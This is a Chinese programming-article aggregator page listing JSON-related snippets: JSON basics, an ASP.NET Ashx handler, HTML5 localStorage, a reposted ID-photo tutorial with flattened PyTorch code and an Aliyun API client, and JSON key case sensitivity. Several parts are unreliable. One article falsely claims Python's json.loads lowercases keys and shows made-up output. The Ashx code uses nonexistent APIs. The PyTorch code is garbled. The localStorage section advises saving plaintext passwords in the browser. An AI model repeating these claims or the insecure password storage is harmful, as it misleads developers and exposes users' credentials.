前端技术
HTML
CSS
Javascript
前端框架和UI库
VUE
ReactJS
AngularJS
JQuery
NodeJS
JSON
Element-UI
Bootstrap
Material UI
服务端和客户端
Java
Python
PHP
Golang
Scala
Kotlin
Groovy
Ruby
Lua
.net
c#
c++
后端WEB和工程框架
SpringBoot
SpringCloud
Struts2
MyBatis
Hibernate
Tornado
Beego
Go-Spring
Go Gin
Go Iris
Dubbo
HessianRPC
Maven
Gradle
数据库
MySQL
Oracle
Mongo
中间件与web容器
Redis
MemCache
Etcd
Cassandra
Kafka
RabbitMQ
RocketMQ
ActiveMQ
Nacos
Consul
Tomcat
Nginx
Netty
大数据技术
Hive
Impala
ClickHouse
DorisDB
Greenplum
PostgreSQL
HBase
Kylin
Hadoop
Apache Pig
ZooKeeper
SeaTunnel
Sqoop
Datax
Flink
Spark
Mahout
数据搜索与日志
ElasticSearch
Apache Lucene
Apache Solr
Kibana
Logstash
数据可视化与OLAP
Apache Atlas
Superset
Saiku
Tesseract
系统与容器
Linux
Shell
Docker
Kubernetes
[非结构化数据到JSON数组的转换 ]的搜索结果
这里是文章列表。热门标签的颜色随机变换,标签颜色没有特殊含义。
点击某个标签可搜索标签相关的文章。
点击某个标签可搜索标签相关的文章。
JSON
JSON , JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,它基于易于阅读和编写的人类可读文本,同时也易于机器解析和生成。在Web应用、API接口开发以及数据传输等领域广泛应用。其结构以键值对形式存在,可以表示简单的数据类型如字符串、数字、布尔值,也可以嵌套表示复杂的数据结构如数组和对象。 结构体(在Go语言中) , 在Go编程语言中,结构体是一种自定义复合数据类型,允许开发者组合多个不同类型的字段来创建新的数据类型。结构体成员可以是任何基本类型或自定义类型,甚至可以包含其他结构体作为其字段,形成嵌套结构。在处理JSON数据时,Go语言的结构体被用来映射JSON对象的结构,通过为结构体字段添加json标签,可以实现JSON数据与结构体字段之间的序列化和反序列化操作。 序列化与反序列化 , 序列化是将数据结构或对象转换为可以进行持久化存储或网络传输的形式(通常为字节流)的过程。在Go语言处理JSON时,结构体的序列化是指将结构体实例转化为JSON字符串;而反序列化则是相反的过程,即将JSON字符串解码恢复成相应的结构体实例。Go语言内置的encoding/json包提供了对JSON数据进行序列化和反序列化的支持,使得程序能够方便地与JSON格式的数据进行交互。
2024-01-12 17:00:16
530
码农
JSON
...下,我们都希望可以将JSON数据从客户端发送到服务器端,并且从服务器端返回响应的数据。这就是Ashx的一个强大功能。 2. 什么是Ashx Ashx是ASP.NET中的一个组件,它可以用于处理HTTP请求。通过Ashx,我们可以创建自己的HTTP处理程序,实现定制的业务逻辑。 3. JSON是什么? JSON(JavaScript Object Notation)是一种轻量级的数据交换格式,它基于JavaScript的一个子集。它易于人阅读和编写,同时也易于机器解析和生成。 4. 如何使用Ashx处理JSON数据? 首先,我们需要定义一个Ashx方法来处理我们的请求。这个方法呐,它得接收一个叫“request”的小家伙作为参数,其实呢,这玩意儿就是一个HttpApplicationRequest对象,里头装着这次请求的所有详细信息,一丁点儿也没落下。 csharp public void HandleHttpRequest(HttpContext context) { // 获取请求的内容 string requestContent = context.Request.InputStream.ReadToEnd(); // 将请求内容转换为JSON对象 dynamic jsonObject = JsonConvert.DeserializeObject(requestContent); // 在这里处理你的JSON数据... // 返回响应 context.Response.Write("处理成功"); } 在这个方法中,我们首先获取了请求的内容,然后使用JsonConvert.DeserializeObject方法将其转换为一个动态类型的JSON对象。这样,我们就可以方便地访问和操作JSON数据了。 5. 总结 Ashx是一个强大的工具,可以帮助我们在ASP.NET中处理各种HTTP请求。尤其是当我们碰上要处理JSON数据这事儿,用Ashx可是能帮咱们省不少力,让事情变得轻松简单多了。当你把请求的内容成功转换成JSON格式后,就等于把它变成一个我们熟悉的.NET对象,这样一来,处理JSON数据就跟玩普通.NET对象一样简单轻松,毫无压力啦! 6. 深入探讨 然而,这只是一个基础的例子。实际上,我们可以使用Ashx做更多的事情。比如说,咱们可以在动手解析JSON数据之前,先给请求做个“体检”确认其靠谱性;又或者,在我们成功搞定数据之后,再添点额外的“小料”,让它更加饱满丰富。 此外,我们也需要注意安全问题。虽然“JsonConvert.DeserializeObject”这个小家伙能够自动挡下不少常见的JSON攻击招式,但我们仍然得瞪大眼睛,确保喂给它的数据确实是货真价实、没毛病的。 总的来说,Ashx是一个非常有用的工具,但我们也需要谨慎使用,以防止可能的安全问题。
2023-06-29 14:38:59
549
灵动之光-t
HTML
...存储。它们的区别在于数据的生命周期不同。你知道吗,localStorage就像个倔强的小记事本,哪怕你把浏览器关了,它也能牢牢地记住之前存进去的数据。但是sessionStorage就不一样啦,它更像一个临时便签,浏览器一关,它就立马“健忘”,之前写的所有数据都会被清清爽爽地清除掉! 二、HTML5本地存储的使用方法 下面,我们就来看一下如何使用这两种接口进行本地存储吧! 2.1 使用localStorage进行本地存储 首先,我们需要通过JavaScript的window对象来调用localStorage的接口。然后,我们可以使用setItem()方法来向localStorage中添加新的键值对,也可以使用getItem()方法来获取指定键对应的值。 以下是一个简单的例子: javascript // 向localStorage中添加一个新的键值对 localStorage.setItem("username", "张三"); // 获取指定键对应的值 var username = localStorage.getItem("username"); console.log(username); // 输出:张三 2.2 使用sessionStorage进行本地存储 同样的,我们也可以通过JavaScript的window对象来调用sessionStorage的接口。不过,你得知道这么个事儿,sessionStorage里头的信息就像临时记事本一样,只在你当前浏览这个网站的这一整个过程,也就是“同一个会话”期间有效。打个比方,就像你看电影时买的一桶爆米花,电影结束,爆米花也就吃完了。同样道理,一旦你的这次会话或者访问结束,sessionStorage里存的所有数据都会被清空掉,不会留下任何痕迹。 以下是一个简单的例子: javascript // 向sessionStorage中添加一个新的键值对 sessionStorage.setItem("username", "李四"); // 获取指定键对应的值 var username = sessionStorage.getItem("username"); console.log(username); // 输出:李四 三、HTML5本地存储的应用场景 说了这么多,那么我们在实际开发中,应该如何利用这些本地存储功能呢?接下来,我就给大家分享一些常见的应用场景。 3.1 存储用户的登录状态 当我们需要让用户在多个页面之间保持登录状态时,就可以将用户的身份信息存储到localStorage中。这样,就算用户在各个页面之间跳来跳去,也能确保他们的登录状态始终稳稳当当的,不会无缘无故消失。 以下是一个简单的例子: javascript // 当用户成功登录后,将用户名和密码存储到localStorage中 localStorage.setItem("username", "张三"); localStorage.setItem("password", "123456"); // 在后续的页面中,可以从localStorage中读取用户的登录信息 var username = localStorage.getItem("username"); var password = localStorage.getItem("password"); 3.2 存储购物车的商品信息 在电商网站中,我们常常需要记录用户购物车中的商品信息。这时候,我们就能把您购物车里的商品信息存到localStorage这个小仓库里头,这样一来,您在各个页面之间穿梭时,都能随时查看和修改您的购物清单啦。 以下是一个简单的例子: javascript // 当用户将商品加入购物车后,将商品信息存储到localStorage中 localStorage.setItem("cart", JSON.stringify([{"id":1,"name":"苹果","price":5},{"id":2,"name":"香蕉","price":3}])); // 在后续的页面中,可以从localStorage中读取购物车中的商品信息 var cart = JSON.parse(localStorage.getItem("cart")); console.log(cart); 总结: 以上就是我为大家介绍的HTML5如何支持本地存储(localStorage)和会话存储(sessionStorage)功能的一些基础知识和常见应用场景。希望通过这篇接地气的文章,大家伙都能把这项牛逼哄哄的功能理解得明明白白,掌握得妥妥当当,这样一来,咱们的开发效率嗖嗖往上升,用户体验蹭蹭地优化,就贼棒啦!如果你有任何问题或者疑问,欢迎随时留言给我,我会尽力帮助你解决问题。最后,感谢大家的阅读和支持!
2023-08-20 09:34:37
515
清风徐来_t
转载文章
...供安全、可靠的计算和数据处理能力,让计算和人工智能成为普惠科技。阿里云服务着制造、金融、政务、交通、医疗、电信、能源等众多领域的领军企业,包括中国联通、12306、中石化、中石油、飞利浦、华大基因等大型企业客户,以及微博、知乎、锤子科技等明星互联网公司。在天猫双11全球狂欢节、12306春运购票等极富挑战的应用场景中,阿里云保持着良好的运行纪录 阿里云在全球各地部署高效节能的绿色数据中心,利用清洁计算为万物互联的新世界提供源源不断的能源动力,开服的区域包括中国(华北、华东、华南、香港)、新加坡、美国(美东、美西)、欧洲、中东、澳大利亚、日本 猿辅导、中泰证券、小米、媛福达、Soul和当贝,这些我们耳熟能详的APP或企业中,阿里云给他们提供了性能强大、安全、稳定的云产品与服务。 计算,容器,存储,网络与CDN,安全、中间件、数据库、大数据计算、人工智能与机器学习、媒体服务、企业服务与云通信、物联网、开发工具、迁移与运维管理和专有云等方面,阿里云都做的很不错。 2.2 证件照生成背景 传统做法:通常是人工进行P图,不仅费时费力,而且效果也很难保障,容易有瑕疵。 机器学习做法:通常利用边缘检测算法进行人物轮廓提取。 深度学习做法:通常使用分割算法进行人物分割。例如U-Net网络。 2.3 图像分割算法 《BiHand: Recovering Hand Mesh with Multi-stage Bisected Hourglass Networks》里的SeedNet网络是很经典的网络,它把分割任务转变成多个任务。作者的思想是:尽可能的通过多任务学习收拢语义,这样或许会分割的更好或姿态估计的更好。其实这个模型就是多阶段学习网络的一部分,作者想通过中间监督来提高网络的性能。 我提取bihand网络中的SeedNet与训练权重,进行分割结果展示如下 我是用的模型不是全程的,是第一阶段的。为了可视化出最好的效果,我把第一阶段也就是SeedNet网络的输出分别采用不同的方式可视化。 从左边数第一张图为原图,第二张图为sigmoid后利用plt.imshow(colored_mask, cmap=‘jet’)进行彩色映射。第三张图为网络输出的张量经过sigmoid后,二色分割图,阀闸值0.5。第四张为网络的直接输出,利用直接产生的张量图进行颜色映射。第五张为使用sigmoid处理张量后进行的颜色映射。第六张为使用sigmoid处理张量后进行0,1分割掩码映射。使用原模型和网络需要添加很多代码。下面为修改后的的代码: 下面为修改后的net_seedd代码: Copyright (c) Lixin YANG. All Rights Reserved.r"""Networks for heatmap estimation from RGB images using Hourglass Network"Stacked Hourglass Networks for Human Pose Estimation", Alejandro Newell, Kaiyu Yang, Jia Deng, ECCV 2016"""import numpy as npimport torchimport torch.nn as nnimport torch.nn.functional as Ffrom skimage import io,transform,utilfrom termcolor import colored, cprintfrom bihand.models.bases.bottleneck import BottleneckBlockfrom bihand.models.bases.hourglass import HourglassBisectedimport bihand.utils.func as funcimport matplotlib.pyplot as pltfrom bihand.utils import miscimport matplotlib.cm as cmdef color_mask(output_ok): 颜色映射cmap = plt.cm.get_cmap('jet') 将张量转换为numpy数组mask_array = output_ok.detach().numpy() 创建彩色图像cmap = cm.get_cmap('jet')colored_mask = cmap(mask_array)return colored_mask 可视化 plt.imshow(colored_mask, cmap='jet') plt.axis('off') plt.show()def two_color(mask_tensor): 将张量转换为numpy数组mask_array = mask_tensor.detach().numpy() 将0到1之间的值转换为二值化掩码threshold = 0.5 阈值,大于阈值的为白色,小于等于阈值的为黑色binary_mask = np.where(mask_array > threshold, 1, 0)return binary_mask 可视化 plt.imshow(binary_mask, cmap='gray') plt.axis('off') plt.show()class SeedNet(nn.Module):def __init__(self,nstacks=2,nblocks=1,njoints=21,block=BottleneckBlock,):super(SeedNet, self).__init__()self.njoints = njointsself.nstacks = nstacksself.in_planes = 64self.conv1 = nn.Conv2d(3, self.in_planes, kernel_size=7, stride=2, padding=3, bias=True)self.bn1 = nn.BatchNorm2d(self.in_planes)self.relu = nn.ReLU(inplace=True)self.maxpool = nn.MaxPool2d(2, stride=2)self.layer1 = self._make_residual(block, nblocks, self.in_planes, 2self.in_planes) current self.in_planes is 64 2 = 128self.layer2 = self._make_residual(block, nblocks, self.in_planes, 2self.in_planes) current self.in_planes is 128 2 = 256self.layer3 = self._make_residual(block, nblocks, self.in_planes, self.in_planes)ch = self.in_planes 256hg2b, res1, res2, fc1, _fc1, fc2, _fc2= [],[],[],[],[],[],[]hm, _hm, mask, _mask = [], [], [], []for i in range(nstacks): 2hg2b.append(HourglassBisected(block, nblocks, ch, depth=4))res1.append(self._make_residual(block, nblocks, ch, ch))res2.append(self._make_residual(block, nblocks, ch, ch))fc1.append(self._make_fc(ch, ch))fc2.append(self._make_fc(ch, ch))hm.append(nn.Conv2d(ch, njoints, kernel_size=1, bias=True))mask.append(nn.Conv2d(ch, 1, kernel_size=1, bias=True))if i < nstacks-1:_fc1.append(nn.Conv2d(ch, ch, kernel_size=1, bias=False))_fc2.append(nn.Conv2d(ch, ch, kernel_size=1, bias=False))_hm.append(nn.Conv2d(njoints, ch, kernel_size=1, bias=False))_mask.append(nn.Conv2d(1, ch, kernel_size=1, bias=False))self.hg2b = nn.ModuleList(hg2b) hgs: hourglass stackself.res1 = nn.ModuleList(res1)self.fc1 = nn.ModuleList(fc1)self._fc1 = nn.ModuleList(_fc1)self.res2 = nn.ModuleList(res2)self.fc2 = nn.ModuleList(fc2)self._fc2 = nn.ModuleList(_fc2)self.hm = nn.ModuleList(hm)self._hm = nn.ModuleList(_hm)self.mask = nn.ModuleList(mask)self._mask = nn.ModuleList(_mask)def _make_fc(self, in_planes, out_planes):bn = nn.BatchNorm2d(in_planes)conv = nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False)return nn.Sequential(conv, bn, self.relu)def _make_residual(self, block, nblocks, in_planes, out_planes):layers = []layers.append( block( in_planes, out_planes) )self.in_planes = out_planesfor i in range(1, nblocks):layers.append(block( self.in_planes, out_planes))return nn.Sequential(layers)def forward(self, x):l_hm, l_mask, l_enc = [], [], []x = self.conv1(x) x: (N,64,128,128)x = self.bn1(x)x = self.relu(x)x = self.layer1(x)x = self.maxpool(x) x: (N,128,64,64)x = self.layer2(x)x = self.layer3(x)for i in range(self.nstacks): 2y_1, y_2, _ = self.hg2b[i](x)y_1 = self.res1[i](y_1)y_1 = self.fc1[i](y_1)est_hm = self.hm[i](y_1)l_hm.append(est_hm)y_2 = self.res2[i](y_2)y_2 = self.fc2[i](y_2)est_mask = self.mask[i](y_2)l_mask.append(est_mask)if i < self.nstacks-1:_fc1 = self._fc1[i](y_1)_hm = self._hm[i](est_hm)_fc2 = self._fc2[i](y_2)_mask = self._mask[i](est_mask)x = x + _fc1 + _fc2 + _hm + _maskl_enc.append(x)else:l_enc.append(x + y_1 + y_2)assert len(l_hm) == self.nstacksreturn l_hm, l_mask, l_encif __name__ == '__main__':a = torch.randn(10, 3, 256, 256) SeedNetmodel = SeedNet() output1,output2,output3 = SeedNetmodel(a) print(output1,output2,output3)total_params = sum(p.numel() for p in SeedNetmodel.parameters())/1000000print("Total parameters: ", total_params)pretrained_weights_path = 'E:/bihand/released_checkpoints/ckp_seednet_all.pth.tar'img_rgb_path=r"E:\FreiHAND\training\rgb\00000153.jpg"img=io.imread(img_rgb_path)resized_img = transform.resize(img, (256, 256), anti_aliasing=True)img256=util.img_as_ubyte(resized_img)plt.imshow(resized_img)plt.axis('off') 关闭坐标轴plt.show()''' implicit HWC -> CHW, 255 -> 1 '''img1 = func.to_tensor(img256).float() 转换为张量并且进行标准化处理''' 0-mean, 1 std, [0,1] -> [-0.5, 0.5] '''img2 = func.normalize(img1, [0.5, 0.5, 0.5], [1, 1, 1])img3 = torch.unsqueeze(img2, 0)ok=img3print(img.shape)SeedNetmodel = SeedNet()misc.load_checkpoint(SeedNetmodel, pretrained_weights_path)加载权重output1, output2, output3 = SeedNetmodel(img3)mask_tensor = torch.rand(1, 64, 64)output=output2[1] 1,1,64,64output_1=output[0] 1,64,64output_ok=torch.sigmoid(output_1[0])output_real=output_1[0].detach().numpy()直接产生的张量图color_mask=color_mask(output_ok) 显示彩色分割图two_color=two_color(output_ok)显示黑白分割图see=output_ok.detach().numpy() 使用Matplotlib库显示分割掩码 plt.imshow(see, cmap='gray') plt.axis('off') plt.show() print(output1, output2, output3)images = [resized_img, color_mask, two_color,output_real,see,see]rows = 1cols = 4 创建子图并展示图像fig, axes = plt.subplots(1, 6, figsize=(30, 5)) 遍历图像列表,并在每个子图中显示图像for i, image in enumerate(images):ax = axes[i] if cols > 1 else axes 如果只有一列,则直接使用axesif i ==5:ax.imshow(image, cmap='gray')else:ax.imshow(image)ax.imshowax.axis('off') 调整子图之间的间距plt.subplots_adjust(wspace=0.1, hspace=0.1) 展示图像plt.show() 上述的代码文件是在bihand/models/net_seed.py中,全部代码链接在https://github.com/lixiny/bihand。 把bihand/models/net_seed.p中的代码修改为我提供的代码即可使用作者训练好的模型和进行各种可视化。(预训练模型根据作者代码提示下载) 3.调用阿里云API进行证件照生成实例 3.1 准备工作 1.找到接口 进入下面链接即可快速访问 link 2.购买试用包 3.查看APPcode 4.下载代码 5.参数说明 3.2 实验代码 !/usr/bin/python encoding: utf-8"""===========================证件照制作接口==========================="""import requestsimport jsonimport base64import hashlibclass Idphoto:def __init__(self, appcode, timeout=7):self.appcode = appcodeself.timeout = timeoutself.make_idphoto_url = 'https://idp2.market.alicloudapi.com/idphoto/make'self.headers = {'Authorization': 'APPCODE ' + appcode,}def get_md5_data(self, body):"""md5加密:param body_json::return:"""md5lib = hashlib.md5()md5lib.update(body.encode("utf-8"))body_md5 = md5lib.digest()body_md5 = base64.b64encode(body_md5)return body_md5def get_photo_base64(self, file_path):with open(file_path, 'rb') as fp:photo_base64 = base64.b64encode(fp.read())photo_base64 = photo_base64.decode('utf8')return photo_base64def aiseg_request(self, url, data, headers):resp = requests.post(url=url, data=data, headers=headers, timeout=self.timeout)res = {"status_code": resp.status_code}try:res["data"] = json.loads(resp.text)return resexcept Exception as e:print(e)def make_idphoto(self, file_path, bk, spec="2"):"""证件照制作接口:param file_path::param bk::param spec::return:"""photo_base64 = self.get_photo_base64(file_path)body_json = {"photo": photo_base64,"bk": bk,"with_photo_key": 1,"spec": spec,"type": "jpg"}body = json.dumps(body_json)body_md5 = self.get_md5_data(body=body)self.headers.update({'Content-MD5': body_md5})data = self.aiseg_request(url=self.make_idphoto_url, data=body, headers=self.headers)return dataif __name__ == "__main__":file_path = "图片地址"idphoto = Idphoto(appcode="你的appcode")d = idphoto.make_idphoto(file_path, "red", "2")print(d) 3.3 实验结果与分析 原图片 背景为红色生成的证件照 背景为蓝色生成的证件照 另外尝试了使用柴犬照片做实验,也生成了证件照 原图 背景为红色生成的证件照 参考(可供参考的链接和引用文献) 1.参考:BiHand: Recovering Hand Mesh with Multi-stage Bisected Hourglass Networks(BMVC2020) 论文链接:https://arxiv.org/pdf/2008.05079.pdf 本篇文章为转载内容。原文链接:https://blog.csdn.net/m0_37758063/article/details/131128967。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-07-11 23:36:51
131
转载
JSON
JSON , JavaScript Object Notation,是一种轻量级的数据交换格式。它基于纯文本,采用完全独立于语言的、清晰简洁的语法来表示键值对集合、数组和其他复杂数据结构,易于阅读和编写,并且能够被机器(特别是JavaScript引擎)直接解析和生成,广泛应用于Web服务接口、配置文件、数据存储等领域中,实现不同系统间的数据交换。 Python字典 , 在Python编程语言中,字典是一种可变容器模型,且可存储任意类型对象(如字符串、数字、元组等)的无序集合。每个项由一个唯一的键和与之关联的值组成,键和值之间通过冒号分隔,各对键值之间用逗号分隔,并放在花括号内。在处理JSON数据时,JSON对象通常会被转换为Python字典,以便在Python程序内部进行操作和处理。 JSON注入 , 类似于SQL注入,JSON注入是一种安全漏洞,攻击者通过向应用提交恶意构造的JSON数据,利用目标应用程序未能有效验证或清理用户输入的问题,进而影响服务器端JSON解析器的行为,以达到篡改数据、执行非预期操作或获取敏感信息的目的。在Python中使用json.loads()方法解析JSON字符串时,应结合严格的数据验证和清理措施来防止JSON注入攻击。
2024-03-03 16:01:36
529
码农
JSON
...和API开发领域中,数据交换格式JSON扮演着至关重要的角色。随着微服务、RESTful API等架构的普及,如何高效、准确地处理JSON与Java对象间的转换成为开发者关注的重点。Jackson库作为Java世界中最常用的JSON处理工具之一,提供了丰富的功能以满足不同场景下的需求。 除了上述文章介绍的基础用法外,Jackson库还支持将JSON转换为自定义的Java Bean对象,并能处理复杂嵌套结构的数据。例如,通过注解的方式,可以指定JSON字段与Java类属性之间的映射关系,使得转换过程更加智能且灵活。此外,对于可能存在的空值或异常情况,Jackson也提供了多种配置选项供开发者进行容错处理。 另一方面,Gson、Fastjson等其他开源库也是处理JSON与Java对象互转的有效工具,各有优劣,开发者可以根据项目需求和性能指标选择合适的库。同时,最新的Java版本(如Java 11及以上)已经原生支持JSON操作,例如使用JsonParser解析JSON,或者通过内置的JSON-B实现进行序列化和反序列化。 值得注意的是,在处理大量数据或高并发场景时,对JSON转换性能的优化至关重要。这包括但不限于选择高效的JSON库、合理设计数据模型以减少转换开销、利用缓冲技术提高IO效率等手段。因此,深入理解并掌握这些技术点,不仅能够提升程序性能,也能更好地应对实际开发中的各种挑战。
2023-12-27 11:56:29
500
逻辑鬼才
JSON
JSON , JavaScript Object Notation,是一种轻量级的数据交换格式,它基于文本,采用完全独立于语言的简洁语法设计,易于人阅读和编写,同时也易于机器解析和生成。在Web开发中广泛应用于服务器与客户端之间的数据传输,能够存储和表示简单值、数组、对象等多种类型的数据结构,并且可以支持嵌套,便于构建复杂的数据模型。 易语言 , 是一款国产的编程语言及其集成开发环境,具有全可视化编程、跨平台、面向对象等特点,旨在降低编程门槛,提高开发效率。易语言支持丰富的API接口调用和模块导入,使得开发者能够轻松实现各种功能,包括处理JSON数据等高级应用。 JSON模块 , 在易语言环境中,JSON模块是一个专门用于处理JSON数据的内置或第三方库,提供了将JSON字符串解析为易语言可操作的对象(如字典或数组)以及将易语言数据结构转换为JSON字符串的功能。通过调用JSON模块的相关函数,开发者能够便捷地读取、解析、创建和修改JSON数据,以满足Web开发中的数据交换需求。 文件操作模块 , 在易语言编程中,文件操作模块是一组预定义的功能组件,用于执行与文件相关的各种操作,例如打开文件、读取文件内容、写入文件、关闭文件等。结合JSON模块,文件操作模块可用于从JSON文件中读取数据,实现数据持久化存储和加载,进一步增强了易语言对JSON数据流处理的能力。
2023-10-08 20:20:12
490
逻辑鬼才
JSON
JSON (JavaScript Object Notation) , JSON是一种轻量级的数据交换格式,基于JavaScript的一个子集,采用完全独立于语言的文本格式来存储和表示数据。在文章语境中,JSON由于其简洁、易于阅读和编写的特点,以及与JavaScript的天然亲和性(可以直接转换为JavaScript对象),成为现代Web服务和应用程序中数据传输和序列化的首选格式。其数据结构主要由键值对构成,通过花括号包裹,并使用逗号分隔不同的键值对。 XML (Extensible Markup Language) , XML是一种标记型语言,设计用于传输和存储数据,具有高度可扩展性和自描述性。在文中对比的场景下,XML通过标签和属性的方式来组织和描述数据结构,相较于JSON更为严谨且支持命名空间等复杂特性。然而,XML的语法相对复杂,体积较大,解析速度较慢,这在一定程度上限制了它在特定应用场景下的效率优势。 嵌套数据 , 嵌套数据是指在一个数据结构内部包含另一个相同类型或不同类型的数据结构,形成一种层次化的关系。在JSON中,嵌套数据体现为一个对象或数组可以作为另一个对象的值存在,例如文章示例中的JSON数据结构中,“age”和“gender”都是根对象内部的嵌套数据。这种结构使得JSON能够以更直观的方式表达复杂的数据关系,提高了数据处理和理解的便利性。
2023-10-22 23:34:21
516
程序媛
JSON
在深入理解Json作为轻量级数据交换格式在网络传输及微信表单源码中的应用后,我们可以进一步探索这一技术在现代数字化生活中的实际影响和最新发展动态。 近日,腾讯微信团队公开表示正在优化其小程序平台的数据交互机制,计划通过强化对Json格式的支持,以实现更高效、灵活的数据处理能力。这意味着未来开发者在构建微信小程序时,能够更加便捷地利用Json来设计复杂多样的动态表单,实时收集并处理用户信息,有效提升用户体验与数据流转效率。 此外,随着JSON-LD(JSON for Linking Data)标准的推广,Json不仅局限于简单的数据交换,也开始在语义网络和知识图谱领域发挥作用。例如,在教育行业的学生信息系统中,采用JSON-LD可以更好地结构化学生的教育经历和工作经历数据,使得这些信息能在不同系统间无缝集成和共享,为大数据分析、智能推荐等应用提供有力支持。 同时,国内外多家大型互联网企业如Google、阿里巴巴等也都在自家服务接口中广泛采纳Json作为数据交换的标准格式,不断推动Json在云计算、物联网等前沿领域的深度应用。 综上所述,Json在信息化社会中的地位日益凸显,无论是对于提升微信等社交平台的数据处理能力,还是在促进跨系统数据整合与开放互联等方面,都展现出巨大的潜力与价值。未来,随着技术的发展与应用场景的拓展,Json将在更多维度助力数字化生活的构建与升级。
2023-10-04 18:11:59
477
软件工程师
JSON
1. JSON解析不分大小写 为什么这很重要? 嘿,大家好!今天我们要聊的是JSON解析中一个常常被忽视但又极其重要的特性——大小写不敏感。这个功能在实际开发里超级实用,特别是当你得对付来自四面八方的数据时,比如说处理API请求或用户填的表单啥的。 想象一下,你正在开发一款应用,需要从服务器获取一些数据,这些数据可能是通过API返回的。不过嘛,服务器那边可能有其他的程序员在维护,他们的大小写风格可能会跟你不一样,给字段起的名字也会有所不同。如果我们解析器的本事不够强,那我们就得不停地改代码,来迁就各种奇葩的命名规矩。这听上去是不是挺麻烦的?所以,知道并用上JSON解析时的大小写不敏感特性,就能让我们的工作轻松不少。 2. JSON的基本概念 在深入讨论之前,先简单回顾一下什么是JSON。JSON(JavaScript Object Notation)是一种轻量级的数据交换格式。它基于JavaScript的一个子集,但实际上几乎所有的编程语言都有库支持JSON解析和生成。 示例1:基本的JSON对象 json { "name": "张三", "age": 28, "is_student": false, "hobbies": ["阅读", "编程", "旅行"] } 在这个简单的例子中,我们可以看到一个包含字符串、数字、布尔值和数组的对象。每个键都是一个字符串,并且它们之间是区分大小写的。不过呢,当我们解析这个JSON时,解析器通常会把键的大小写统统忽略掉,直接给它们统一成小写。 3. 解析器如何处理大小写 现在,让我们来看看具体的解析过程。现在大部分编程语言都自带了超级好用的JSON解析工具,用它们来处理JSON数据时,根本不用操心大小写的问题,特别省心。它们会将所有键转换为一种标准形式,通常是小写。这就表示,就算你开始时在原始的JSON里用了大写或大小写混用,最后这些键还是会自动变成小写。 示例2:大小写不敏感的解析 假设我们有以下JSON数据: json { "Name": "李四", "AGE": 35, "Is_Student": true, "Hobbies": ["足球", "音乐"] } 如果我们使用Python的json库来解析这段数据: python import json data = '{"Name": "李四", "AGE": 35, "Is_Student": true, "Hobbies": ["足球", "音乐"]}' parsed_data = json.loads(data) print(parsed_data) 输出将是: python {'name': '李四', 'age': 35, 'is_student': True, 'hobbies': ['足球', '音乐']} 可以看到,所有的键都被转换成了小写。这就意味着我们在后面处理数据的时候,可以更轻松地找到这些键,完全不需要担心大小写的问题。 4. 实际开发中的应用 理解了这个特性之后,我们在实际开发中应该如何应用呢?首先,我们需要确保我们的代码能够正确处理大小写不同的情况。比如说,在拿数据的时候,咱们最好每次都确认一下键名是不是小写,别直接用固定的大小写硬来。 示例3:处理大小写不一致的情况 假设我们有一个函数,用于从用户输入的JSON数据中提取姓名信息: python def get_name(json_data): data = json.loads(json_data) return data.get('name') or data.get('NAME') or data.get('Name') 测试 json_input1 = '{"name": "王五"}' json_input2 = '{"NAME": "赵六"}' json_input3 = '{"Name": "孙七"}' print(get_name(json_input1)) 输出: 王五 print(get_name(json_input2)) 输出: 赵六 print(get_name(json_input3)) 输出: 孙七 在这个例子中,我们通过get方法尝试获取三个可能的键名('name'、'NAME'、'Name'),确保无论用户输入的JSON数据中使用哪种大小写形式,我们都能正确提取到姓名信息。 5. 结论与思考 通过今天的讨论,我们了解到JSON解析中的大小写不敏感特性是一个非常有用的工具。它可以帮助我们减少因大小写不一致带来的错误,提高代码的健壮性和可维护性。当然,这并不意味着我们可以完全把大小写的事儿抛在脑后,而是说我们应该用更灵活的方式去应对它们。 希望这篇文章能帮助你更好地理解和利用这一特性。如果你有任何疑问或者想法,欢迎在评论区留言交流。咱们下次再见!
2025-01-13 16:02:04
18
诗和远方
JSON
JSON:网站数据导入源的利器 在当今的Web开发世界中,JSON(JavaScript Object Notation)作为一种轻量级的数据交换格式,凭借其简洁的语法、易于人阅读和编写以及机器解析的特点,在网站数据交互、API接口设计等方面扮演着举足轻重的角色。这篇文会手把手地带你潜入JSON如何充当网站数据搬运工的内部世界,并且,咱还会通过一些超实用的代码实例,让你亲身体验一把这个过程有多酷炫! 1. 初识JSON 一种易读易写的格式 首先,让我们回顾一下JSON的基本结构。JSON这家伙,可厉害了,它用的是一种跟任何编程语言都“不粘锅”的文本格式,能够超级给力地把那些乱七八糟、复杂无比的数据结构,比如数组、对象什么的,整得清清楚楚、明明白白。例如: json { "users": [ { "id": 1, "name": "Alice", "email": "alice@example.com" }, { "id": 2, "name": "Bob", "email": "bob@example.com" } ] } 这段JSON数据清晰地展现了用户列表信息,每个用户都有自己的ID、姓名和邮箱地址。这正是JSON让人着迷的地方,它能用咱们人类看得懂的方式去表达数据,而且机器也能轻松解析理解,真可谓“人机对话”的小能手。 2. JSON与网站数据导入 在实际的网站开发场景中,我们经常需要从外部源导入数据,如API接口、文件或数据库。JSON格式因其通用性,成为理想的数据传输媒介。以下是一个典型的网站导入JSON数据的例子: javascript // 假设我们从某个API获取到了上述JSON数据 fetch('https://example.com/api/users') .then(response => response.json()) .then(data => { // 解析并处理JSON数据 const users = data.users; users.forEach(user => { console.log(User ID: ${user.id}, Name: ${user.name}); // 这里可以将用户数据插入到网站DOM或其他存储中 }); }) .catch(error => console.error('Error fetching data:', error)); 在这段代码中,我们通过fetch函数请求一个返回JSON数据的API,然后利用.json()方法将其转化为JavaScript对象,进而进行数据处理和展示。这便是JSON在网站数据导入中的核心应用。 3. JSON的应用深度探讨 - 数据交互:JSON不仅适用于前后端数据交换,也常用于客户端和服务端之间、甚至不同系统之间的数据传递。它减少了数据转换的成本,简化了开发流程。 - 兼容性:由于JSON是基于JavaScript的对象字面量,因此在浏览器环境中可以直接转化为JavaScript对象,无需额外的库或工具支持。 - 灵活性:JSON结构灵活多变,可以表示复杂的嵌套数据结构,适应各种业务场景的需求。 - 性能优化:相对于XML等其他数据格式,JSON的体积更小,解析速度更快,有利于提升网站性能。 4. 结语 拥抱JSON,让数据流动更自由 